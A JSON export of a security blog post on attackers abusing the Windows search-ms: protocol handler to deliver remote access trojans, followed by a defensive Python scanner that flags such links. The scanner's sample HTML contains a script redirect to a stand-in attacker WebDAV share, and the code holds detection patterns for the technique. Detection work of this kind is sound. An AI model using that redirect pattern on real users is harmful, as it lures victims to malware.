{"id":168722,"date":"2023-07-31T04:23:20","date_gmt":"2023-07-31T09:23:20","guid":{"rendered":"https:\/\/lifeboat.com\/blog\/2023\/07\/hackers-abusing-windows-search-feature-to-install-remote-access-trojans"},"modified":"2023-07-31T04:23:20","modified_gmt":"2023-07-31T09:23:20","slug":"hackers-abusing-windows-search-feature-to-install-remote-access-trojans","status":"publish","type":"post","link":"https:\/\/lifeboat.com\/blog\/2023\/07\/hackers-abusing-windows-search-feature-to-install-remote-access-trojans","title":{"rendered":"Hackers Abusing Windows Search Feature to Install Remote Access Trojans"},"content":{"rendered":"<p>A legitimate Windows search feature is being exploited by unknown malicious actors to download arbitrary payloads from remote servers and compromise targeted systems with remote access trojans such as AsyncRAT and Remcos RAT.<\/p>\n<p>The novel attack technique, per Trellix, takes advantage of the \u201c<a href=\"https:\/\/learn.microsoft.com\/en-us\/windows\/win32\/search\/getting-started-with-parameter-value-arguments\" rel=\"noopener\" target=\"_blank\">search-ms:<\/a>\u201d URI protocol handler, which offers the ability for applications and HTML links to launch custom local searches on a device, and the \u201c<a href=\"https:\/\/learn.microsoft.com\/en-us\/previous-versions\/windows\/desktop\/legacy\/cc144083(v=vs.85)\" rel=\"noopener\" target=\"_blank\">search:<\/a>\u201d application protocol, a mechanism for calling the desktop search application on Windows.<\/p>\n<p>\u201cAttackers are directing users to websites that exploit the \u2018search-ms\u2019 functionality using JavaScript hosted on the page,\u201d security researchers Mathanraj Thangaraju and Sijo Jacob <a 
href=\"https:\/\/www.trellix.com\/en-us\/about\/newsroom\/stories\/research\/beyond-file-search-a-novel-method.html\" rel=\"noopener\" target=\"_blank\">said<\/a> in a Thursday write-up. \u201cThis technique has even been extended to HTML attachments, expanding the attack surface.\u201d<\/p>\n","protected":false},"excerpt":{"rendered":"<p>A legitimate Windows search feature is being exploited by unknown malicious actors to download arbitrary payloads from remote servers and compromise targeted systems with remote access trojans such as AsyncRAT and Remcos RAT. The novel attack technique, per Trellix, takes advantage of the \u201csearch-ms:\u201d URI protocol handler, which offers the ability for applications and HTML [\u2026]<\/p>\n","protected":false},"author":427,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1492],"tags":[],"class_list":["post-168722","post","type-post","status-publish","format-standard","hentry","category-security"],"_links":{"self":[{"href":"https:\/\/lifeboat.com\/blog\/wp-json\/wp\/v2\/posts\/168722","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/lifeboat.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/lifeboat.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/lifeboat.com\/blog\/wp-json\/wp\/v2\/users\/427"}],"replies":[{"embeddable":true,"href":"https:\/\/lifeboat.com\/blog\/wp-json\/wp\/v2\/comments?post=168722"}],"version-history":[{"count":0,"href":"https:\/\/lifeboat.com\/blog\/wp-json\/wp\/v2\/posts\/168722\/revisions"}],"wp:attachment":[{"href":"https:\/\/lifeboat.com\/blog\/wp-json\/wp\/v2\/media?parent=168722"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/lifeboat.com\/blog\/wp-json\/wp\/v2\/categories?post=168722"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/lifeboat.com\/blog\/wp-json\/wp\/v2\/tags?post=168722"
}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
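The post describes search-ms: links, delivered either from page JavaScript or in HTML attachments, that point Windows Search at an attacker-controlled location. The scanner below is an added example written for this page, not code from Trellix or from the researchers quoted above. It walks HTML (a saved page or an .html mail attachment), collects every search-ms:/search: URI from link attributes and inline script text, and flags the ones whose documented crumb=location: parameter names a remote UNC or HTTP(S) path rather than a local folder. The embedded HTML sample is constructed for the example, and the host files.example.invalid is hypothetical.

```python
"""Scan HTML for search-ms:/search: protocol-handler URIs that scope a
Windows Search to a remote (UNC or WebDAV) location."""
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Attributes where a protocol-handler URI can be planted; <script> bodies are
# covered separately via handle_data().
_LINK_ATTRS = {"href", "src", "action", "data", "content"}
_URI_RE = re.compile(r'''(?:search-ms|search):[^\s"'<>]+''', re.IGNORECASE)
# search-ms parameters are "&"-separated; "crumb=location:<path>" is the
# documented way to restrict a search to a folder, and "displayname=" sets
# the title shown in the Explorer window.
_LOCATION_RE = re.compile(r'crumb=location:([^&]+)', re.IGNORECASE)
_DISPLAYNAME_RE = re.compile(r'displayname=([^&]+)', re.IGNORECASE)
# Remote locations: UNC paths (including host@SSL@443\DavWWWRoot WebDAV
# syntax) or HTTP(S) URLs. Local drive letters and %VAR% paths do not match.
_REMOTE_RE = re.compile(r'^(\\\\|//|https?://)', re.IGNORECASE)


class _Collector(HTMLParser):
    """Gather attribute values and text nodes (incl. inline scripts)."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value and name.lower() in _LINK_ATTRS:
                self.chunks.append(value)

    def handle_data(self, data):
        # <script> content is delivered here, so JS-built redirects are seen too.
        self.chunks.append(data)


def extract_search_uris(html):
    """Return every search-ms:/search: URI found in attributes or script text."""
    parser = _Collector()
    parser.feed(html)
    parser.close()
    found = []
    for chunk in parser.chunks:
        found.extend(m.group(0) for m in _URI_RE.finditer(chunk))
    return found


def analyze_search_uri(uri):
    """Pull out scheme, search location and display name; flag remote locations."""
    decoded = unquote(uri)
    scheme = decoded.split(":", 1)[0].lower()
    loc = _LOCATION_RE.search(decoded)
    name = _DISPLAYNAME_RE.search(decoded)
    location = loc.group(1) if loc else None
    return {
        "uri": uri,
        "scheme": scheme,
        "location": location,
        "displayname": name.group(1) if name else None,
        "remote": bool(location and _REMOTE_RE.match(location)),
    }


def find_suspicious(html):
    """Analyses of search URIs whose location is a remote UNC/WebDAV path."""
    return [a for a in map(analyze_search_uri, extract_search_uris(html)) if a["remote"]]


# Constructed sample (not a real capture): one benign local search link and a
# script redirect to a search scoped to a hypothetical attacker WebDAV share.
SAMPLE_HTML = r"""
<html><body>
<a href="search-ms:query=invoice&crumb=location:%USERPROFILE%\Documents&displayname=Local%20Documents">Find invoices</a>
<script>
  window.location.href = "search-ms:query=Invoice&crumb=location:\\\\files.example.invalid@SSL@443\\DavWWWRoot\\share&displayname=Downloads";
</script>
</body></html>
"""

if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_HTML):
        print(f"[!] {hit['scheme']}: search scoped to remote location "
              f"{hit['location']} (shown as '{hit['displayname']}')")
```

The script only tells you that a page or attachment would drive Windows Search to a remote share; what the share serves (the post names AsyncRAT and Remcos RAT delivered this way) still has to be pulled and examined separately. Because the parser reads the raw JavaScript source, backslashes appear doubled in the reported location; the prefix test is written so both the source and runtime forms match.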